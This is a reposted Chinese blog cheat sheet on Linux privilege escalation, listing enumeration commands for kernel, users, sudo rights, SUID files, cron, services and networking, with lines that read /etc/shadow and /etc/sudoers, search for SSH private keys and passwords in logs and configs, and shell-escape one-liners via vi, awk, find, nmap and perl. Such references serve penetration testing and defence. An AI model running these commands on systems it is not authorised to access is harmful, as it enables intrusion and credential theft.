linux提权总结
来源:互联网 发布:易通网络vpn加速器 编辑:程序博客网 时间:2024/05/21 08:45
ernel, Operating System & Device Information:
uname -a
Print all available system informationuname -r
Kernel releaseuname -n
System hostnamehostname
As aboveuname -m
Linux kernel architecture (32 or 64 bit)cat /proc/version
Kernel informationcat /etc/*-release
Distribution informationcat /etc/issue
As abovecat /proc/cpuinfo
CPU informationdf -a
File system information
Users & Groups:
cat /etc/passwd
List all users on the systemcat /etc/group
List all groups on the systemfor i in $(cat /etc/passwd 2>/dev/null| cut -d":" -f1 2>/dev/null);do id $i;done 2>/dev/null
List all uid’s and respective group membershipscat /etc/shadow
Show user hashes – Privileged commandgrep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'
List all super user accountsfinger
Users currently logged inpinky
As aboveusers
As abovewho -a
As abovew
Who is currently logged in and what they’re doinglast
Listing of last logged on userslastlog
Information on when all users last logged inlastlog –u %username%
Information on when the specified user last logged inlastlog |grep -v "Never"
Entire list of previously logged on users
User & Privilege Information:
whoami
Current usernameid
Current user informationcat /etc/sudoers
Who’s allowed to do what as root –Privileged commandsudo -l
Can the current user perform anything as rootsudo -l 2>/dev/null | grep -w 'nmap\|perl\|'awk'\|'find'\|'bash'\|'sh'\|'man'\
|'more'\|'less'\|'vi'\|'vim'\|'nc'\|'netcat'\|python\
|ruby\|lua\|irb' | xargs -r ls -la 2>/dev/null
Can the current user run any ‘interesting’ binaries as root and if so also display the binary permissions etc.
Environmental Information:
env
Display environmental variablesset
As aboveecho $PATH
Path informationhistory
Displays command history of current userpwd
Print working directory, i.e. ‘where am I’cat /etc/profile
Display default system variablescat /etc/shells
Display available shells
Interesting Files:
find / -perm -4000 -type f 2>/dev/null
Find SUID filesfind / -uid 0 -perm -4000 -type f 2>/dev/null
Find SUID files owned by rootfind / -perm -2000 -type f 2>/dev/null
Find GUID filesfind / -perm -2 -type f 2>/dev/null
Find world-writeable filesfind / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null
Find world-writeable files excluding those in /procfind / -perm -2 -type d 2>/dev/null
Find word-writeable directoriesfind /home –name *.rhosts -print 2>/dev/null
Find rhost config filesfind /home -iname *.plan -exec ls -la {} \; -exec cat {} 2>/dev/null \;
Find *.plan files, list permissions and cat the file contentsfind /etc -iname hosts.equiv -exec ls -la {} 2>/dev/null \; -exec cat {} 2>/dev/null \;
Find hosts.equiv, list permissions and cat the file contentsls -ahlR /root/
See if you can access other user directories to find interesting filescat ~/.bash_history
Show the current users’ command historyls -la ~/.*_history
Show the current users’ various history filesls -la /root/.*_history
Can we read root’s history filesls -la ~/.ssh/
Check for interesting ssh files in the current users’ directoryfind / -name "id_dsa*" -o -name "id_rsa*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" 2>/dev/null |xargs -r ls -la
Find SSH keys/host informationls -la /usr/sbin/in.*
Check Configuration of inetd servicesgrep -l -i pass /var/log/*.log 2>/dev/null
Check log files for keywords (‘pass’ in this example) and show positive matchesfind /var/log -type f -exec ls -la {} \; 2>/dev/null
List files in specified directory (/var/log)find /var/log -name *.log -type f -exec ls -la {} \; 2>/dev/null
List .log files in specified directory (/var/log)find /etc/ -maxdepth 1 -name *.conf -type f -exec ls -la {} \; 2>/dev/null
List .conf files in /etc (recursive 1 level)ls -la /etc/*.conf
As abovefind / -maxdepth 4 -name *.conf -type f -exec grep -Hn password {} \; 2>/dev/null
Find .conf files (recursive 4 levels) and output line number where the word ‘password’ is locatedlsof -i -n
List open files (output will depend on account privileges)head /var/mail/root
Can we read roots mail
Service Information:
ps aux | grep root
View services running as rootps aux | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++'
Lookup process binary path and permissionscat /etc/inetd.conf
List services managed by inetdcat /etc/xinetd.conf
As above for xinetdcat /etc/xinetd.conf 2>/dev/null | awk '{print $7}' |xargs -r ls -la 2>/dev/null
A very ‘rough’ command to extract associated binaries from xinetd.conf and show permissions of eachls -la /etc/exports 2>/dev/null; cat /etc/exports 2>/dev/null
Permissions and contents of /etc/exports (NFS)
Jobs/Tasks:
crontab -l -u %username%
Display scheduled jobs for the specified user – Privileged commandls -la /etc/cron*
Scheduled jobs overview (hourly, daily, monthly etc)ls -aRl /etc/cron* | awk '$1 ~ /w.$/' 2>/dev/null
What can ‘others’ write in /etc/cron* directoriestop
List of current tasks
Networking, Routing & Communications:
/sbin/ifconfig -a
List all network interfacescat /etc/network/interfaces
As abovearp -a
Display ARP communicationsroute
Display route informationcat /etc/resolv.conf
Show configured DNS sever addressesnetstat -antp
List all TCP sockets and related PIDs (-p Privileged command)netstat -anup
List all UDP sockets and related PIDs (-p Privileged command)iptables -L
List rules – Privileged commandcat /etc/services
View port numbers/services mappings
Programs Installed:
dpkg -l
Installed packages (Debian)rpm -qa
Installed packages (Red Hat)sudo -V
Sudo version – does an exploit exist?httpd -v
Apache versionapache2 -v
As aboveapache2ctl (or apachectl) -M
List loaded Apache modulesmysql --version
Installed MYSQL version detailspsql -V
Installed Postgres version detailsperl -v
Installed Perl version detailsjava -version
Installed Java version detailspython --version
Installed Python version detailsruby -v
Installed Ruby version detailsfind / -name %program_name% 2>/dev/null
(i.e. nc, netcat, wget, nmap etc)Locate ‘useful’ programs (netcat, wget etc)which %program_name%
(i.e. nc, netcat, wget, nmap etc)As abovedpkg --list 2>/dev/null| grep compiler |grep -v decompiler 2>/dev/null && yum list installed 'gcc*' 2>/dev/null| grep gcc 2>/dev/null
List available compilerscat /etc/apache2/envvars 2>/dev/null |grep -i 'user\|group' |awk '{sub(/.*\export /,"")}1'
Which account is Apache running as
Common Shell Escape Sequences:
:!bash
vi, vim:set shell=/bin/bash
:shell
vi, vim!bash
man, more, lessfind / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;
findawk 'BEGIN {system("/bin/bash")}'
awk--interactive
nmapperl -e 'exec "/bin/bash";'
Perl转载自:http://www.rebootuser.com/?p=1623#.VzPhuda1nCI
1 0
- linux提权总结
- Linux爆本地提权漏洞,总结修复办法
- Linux渗透与提权:技巧总结篇
- Linux渗透与提权:技巧总结篇
- linux 总结
- linux总结
- LINUX总结
- linux总结
- linux总结
- linux总结
- Linux总结
- Linux总结
- Linux总结
- Linux 总结
- linux总结
- linux总结
- linux 总结
- linux总结
- POJ 1704-Georgia and Bob棋子移动(Nim博弈)
- Android圆形以及圆角矩形头像
- 查找排序算法汇总
- STL容器的适用情况和缺点
- 书签
- linux提权总结
- word选择了自动断字却不出现连字符-解决办法
- 图片随滚动条滚动的代码
- 做一个有冒险精神的人!开启漫漫的agera之旅
- JavaWeb开发之Servlet的请求流程剖析-图片版 (跟龙哥学javaweb)笔记
- Visual studio 2008环境配置:C#显示代码行号、全屏显示
- 3017
- Frobenius norm(弗罗贝尼乌斯范数)
- linux下GDB调试C++标准库STL,打印STL对象的内容